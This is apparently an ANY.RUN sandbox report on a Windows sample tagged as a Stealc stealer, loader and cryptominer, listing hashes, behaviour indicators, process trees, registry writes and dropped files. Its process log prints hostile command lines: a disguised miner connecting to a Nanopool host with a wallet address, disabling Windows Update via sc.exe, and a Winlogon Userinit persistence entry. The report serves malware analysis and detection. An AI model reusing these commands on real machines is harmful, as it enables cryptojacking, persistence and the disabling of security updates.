Malware analysis SecuriteInfo.com.Win32.Evo-gen.2137.19052 Malicious activity

Add for printing

File name:	SecuriteInfo.com.Win32.Evo-gen.2137.19052
Full analysis:	https://app.any.run/tasks/b9c6da8d-89cb-43e0-9aa2-d236b6146128
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	May 24, 2025, 21:39:55
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	stealc stealer themida loader pastebin winring0x64-sys vuln-driver miner
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, 7 sections
MD5:	9BE374511F90BD82DA2B1F929FAB0376
SHA1:	5201A60F2298E995C60A0B3FD4D123705D8017F7
SHA256:	8957216CF0FF3B340C066EA6DC984650D928E6479B4F67040632DA1652A1F5CD
SSDEEP:	98304:HkFt/7fA43jHhk6gu8TgFfp7zjwCAGZ7vFtRm+mg/Y+JvJDtmugmtjItxUONma1y:Iio

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- STEALC has been detected
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 6040)
- Actions looks like stealing of personal data
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Starts CMD.EXE for self-deleting
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - gzEtZRFsDvXP.exe (PID: 6572)
- Uses Task Scheduler to run other applications
  - cmd.exe (PID: 1168)
  - gzEtZRFsDvXP.exe (PID: 6572)
- Changes the login/logoff helper path in the registry
  - MHEkMQHLQQ0q.exe (PID: 6392)
- Changes the Windows auto-update feature
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Adds path to the Windows Defender exclusion list
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Changes Windows Defender settings
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Adds extension to the Windows Defender exclusion list
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Uninstalls Malicious Software Removal Tool (MRT)
  - cmd.exe (PID: 6512)
  - cmd.exe (PID: 3900)
- Deletes shadow copies
  - cmd.exe (PID: 6244)
  - cmd.exe (PID: 2084)
- Vulnerable driver has been detected
  - WmiPrvSE.exe (PID: 4016)
- MINER has been detected (SURICATA)
  - svchost.exe (PID: 2196)
SUSPICIOUS
- Reads the BIOS version
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Searches for installed software
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Reads security settings of Internet Explorer
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
- There is functionality for taking screenshot (YARA)
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Multiple wallet extension IDs have been found
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Connects to the server without a host name
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Starts process via Powershell
  - powershell.exe (PID: 6040)
- Starts POWERSHELL.EXE for commands execution
  - gzEtZRFsDvXP.exe (PID: 6156)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Starts CMD.EXE for commands execution
  - gzEtZRFsDvXP.exe (PID: 6156)
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - powershell.exe (PID: 6040)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - UserOOBEBroker.exe (PID: 5384)
  - WmiPrvSE.exe (PID: 4016)
- Starts NET.EXE to display or manage information about active sessions
  - cmd.exe (PID: 6668)
  - net.exe (PID: 6240)
  - cmd.exe (PID: 1188)
  - net.exe (PID: 7020)
  - cmd.exe (PID: 2040)
  - net.exe (PID: 5392)
- Executable content was dropped or overwritten
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Loads DLL from Mozilla Firefox
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Process drops legitimate windows executable
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - gzEtZRFsDvXP.exe (PID: 6572)
- Process requests binary or script from the Internet
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Potential Corporate Privacy Violation
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - svchost.exe (PID: 2196)
- Reads the date of Windows installation
  - MHEkMQHLQQ0q.exe (PID: 6744)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 5720)
  - cmd.exe (PID: 2644)
  - cmd.exe (PID: 3100)
- Application launched itself
  - MHEkMQHLQQ0q.exe (PID: 6744)
- Lists all scheduled tasks
  - schtasks.exe (PID: 5084)
  - schtasks.exe (PID: 6392)
- Hides command output
  - cmd.exe (PID: 5720)
  - cmd.exe (PID: 3100)
- The executable file from the user directory is run by the CMD process
  - gzEtZRFsDvXP.exe (PID: 6572)
- Script adds exclusion path to Windows Defender
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Windows service management via SC.EXE
  - sc.exe (PID: 4164)
  - sc.exe (PID: 2616)
  - sc.exe (PID: 6252)
  - sc.exe (PID: 5576)
  - sc.exe (PID: 5984)
  - sc.exe (PID: 904)
  - sc.exe (PID: 2288)
  - sc.exe (PID: 6572)
  - sc.exe (PID: 5452)
  - sc.exe (PID: 5796)
- Stops a currently running service
  - sc.exe (PID: 6640)
  - sc.exe (PID: 6800)
  - sc.exe (PID: 2344)
  - sc.exe (PID: 4008)
  - sc.exe (PID: 4268)
  - sc.exe (PID: 5776)
  - sc.exe (PID: 1088)
  - sc.exe (PID: 5728)
  - sc.exe (PID: 5556)
  - sc.exe (PID: 6760)
- Starts SC.EXE for service management
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- The process deletes folder without confirmation
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Uses powercfg.exe to modify the power settings
  - cmd.exe (PID: 5308)
  - cmd.exe (PID: 6640)
  - cmd.exe (PID: 1852)
  - cmd.exe (PID: 5556)
  - cmd.exe (PID: 6652)
  - cmd.exe (PID: 3956)
  - cmd.exe (PID: 5576)
  - cmd.exe (PID: 5744)
  - cmd.exe (PID: 4244)
  - cmd.exe (PID: 4724)
- Script adds exclusion extension to Windows Defender
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Process uninstalls Windows update
  - wusa.exe (PID: 6736)
  - wusa.exe (PID: 6264)
- Executes as Windows Service
  - VSSVC.exe (PID: 4608)
- The process executes via Task Scheduler
  - UserOOBEBroker.exe (PID: 5384)
  - WmiPrvSE.exe (PID: 4016)
- Drops a system driver (possible attempt to evade defenses)
  - WmiPrvSE.exe (PID: 4016)
- Connects to unusual port
  - SystemOneDriveSvc64a.exe (PID: 660)
INFO
- Checks supported languages
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - gzEtZRFsDvXP.exe (PID: 6156)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - UserOOBEBroker.exe (PID: 5384)
  - WmiPrvSE.exe (PID: 4016)
- Reads the computer name
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - gzEtZRFsDvXP.exe (PID: 6156)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - UserOOBEBroker.exe (PID: 5384)
  - WmiPrvSE.exe (PID: 4016)
- Checks proxy server information
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Reads CPU info
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Creates files in the program directory
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - gzEtZRFsDvXP.exe (PID: 6572)
- Themida protector has been detected
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- Creates files or folders in the user directory
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
- The sample compiled with english language support
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - gzEtZRFsDvXP.exe (PID: 6572)
  - WmiPrvSE.exe (PID: 4016)
- Process checks computer location settings
  - SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe (PID: 2656)
  - MHEkMQHLQQ0q.exe (PID: 6744)
- Reads the machine GUID from the registry
  - MHEkMQHLQQ0q.exe (PID: 6744)
  - MHEkMQHLQQ0q.exe (PID: 6392)
  - UserOOBEBroker.exe (PID: 5384)
- Checks if a key exists in the options dictionary (POWERSHELL)
  - powershell.exe (PID: 4112)
  - powershell.exe (PID: 4120)
  - powershell.exe (PID: 7152)
  - powershell.exe (PID: 1056)
  - powershell.exe (PID: 2560)
  - powershell.exe (PID: 3956)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 4112)
  - powershell.exe (PID: 4120)
  - powershell.exe (PID: 7152)
  - powershell.exe (PID: 1056)
  - powershell.exe (PID: 3956)
  - powershell.exe (PID: 2560)
- The sample compiled with japanese language support
  - WmiPrvSE.exe (PID: 4016)
- Reads the software policy settings
  - slui.exe (PID: 2320)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (64.6)
.dll	\|	Win32 Dynamic Link Library (generic) (15.4)
.exe	\|	Win32 Executable (generic) (10.5)
.exe	\|	Generic Win/DOS Executable (4.6)
.exe	\|	DOS Executable Generic (4.6)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2025:05:16 02:45:17+00:00
ImageFileCharacteristics:	Executable, 32-bit
PEType:	PE32
LinkerVersion:	14.43
CodeSize:	299520
InitializedDataSize:	329728
UninitializedDataSize:	-
EntryPoint:	0x421058
OSVersion:	6
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

283

Monitored processes

153

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

456

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

660

"C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Microsoft\MicrosoftWeb.{7007ACC7-3202-11D1-AAD2-00805FC1270E}\SystemOneDriveSvc64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG11 -p RIG11 --cpu-priority=2 --randomx-mode=fast --tls --threads=2

C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\MicrosoftWeb.{7007ACC7-3202-11D1-AAD2-00805FC1270E}\SystemOneDriveSvc64a.exe

WmiPrvSE.exe

User:

SYSTEM

Company:

Realtek Semiconductor

Integrity Level:

SYSTEM

Description:

Realtek HD Audio Universal Service

Version:

1.1.664.1

Modules

Images
c:\windows\system32\config\systemprofile\appdata\roaming\microsoft\microsoftweb.{7007acc7-3202-11d1-aad2-00805fc1270e}\systemonedrivesvc64a.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

664

powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c

C:\Windows\System32\powercfg.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Power Settings Command-Line Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\bcrypt.dll

668

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

680

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

684

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

720

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

sc.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

720

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

732

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Power Settings Command-Line Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll

904

sc.exe config wuauserv start= disabled

C:\Windows\System32\sc.exe

—

WmiPrvSE.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Service Control Manager Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

Add for printing

Total events

50 628

Read events

50 607

Write events

Delete events

Modification events


(PID) Process:	(6040) chrome.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:	write	Name:	failed_count
Value: 0
(PID) Process:	(6040) chrome.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:	write	Name:	state
Value: 2
(PID) Process:	(2656) SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(2656) SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(2656) SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(2656) SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:	(6392) MHEkMQHLQQ0q.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:	write	Name:	Userinit
Value: C:\Windows\system32\userinit.exe,C:\ProgramData\WindowsService.{D20EA4E1-3957-11D2-A40B-0C5020524153}\UserOOBEBroker.exe
(PID) Process:	(6572) gzEtZRFsDvXP.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
Operation:	write	Name:	NoAutoUpdate
Value: 1
(PID) Process:	(6572) gzEtZRFsDvXP.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
Operation:	write	Name:	NoAUShutdownOption
Value: 1
(PID) Process:	(6572) gzEtZRFsDvXP.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
Operation:	write	Name:	AlwaysAutoRebootAtScheduledTime
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\3Ebsk1sJn7MY		binary
		MD5:F6C33AC5E1032A0873BE7BFC65169287	SHA256:D97895CEDED32E33D57BDCACCDBE144E58AA87AF4D2F8855D630286CE30A8D83
6040	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qq4wccwx.pgu.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\Users\admin\Documents\gzEtZRFsDvXP.exe		executable
		MD5:273C6AFCD5BF61249E9AA607704C8D94	SHA256:8C6DDDDE41AF5AFD2E33B92000A107105559B570858E17C939BB2D91F5AAB5FF
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\s8QuRIPAqpRS		binary
		MD5:06AD9E737639FDC745B3B65312857109	SHA256:C8925892CA8E213746633033AE95ACFB8DD9531BC376B82066E686AC6F40A404
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\6xL8pQzezuIr		binary
		MD5:A45465CDCDC6CB30C8906F3DA4EC114C	SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\Users\admin\Documents\MHEkMQHLQQ0q.exe		executable
		MD5:DF8E8755AA4E2A8D705D6C28CC0B7D2D	SHA256:441F4A7FF235A84891AB4616A98C814797EBB4D5BAE46792FA6043D9C0080521
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\Me5iSzYRn7Fk		binary
		MD5:29A644B1F0D96166A05602FE27B3F4AD	SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\ol0b7WqvYpbl		binary
		MD5:95FFD778940E6DF4846B0B12C8DD5821	SHA256:21A2DEBD389DB456465DFEFFDB15F0AF3FBC46F007CBA67513A13EB10D14E94F
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\ProgramData\PPqZ2d46zAdK		binary
		MD5:46D9FCA6032297F8AEE08D73418312BA	SHA256:865856FA4C33C4AEE52E15FBB370B6611468FE947E76E197F0E50D0AD62CB1B4
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\addon2[1].exe		executable
		MD5:DF8E8755AA4E2A8D705D6C28CC0B7D2D	SHA256:441F4A7FF235A84891AB4616A98C814797EBB4D5BAE46792FA6043D9C0080521

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	2.16.168.124:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
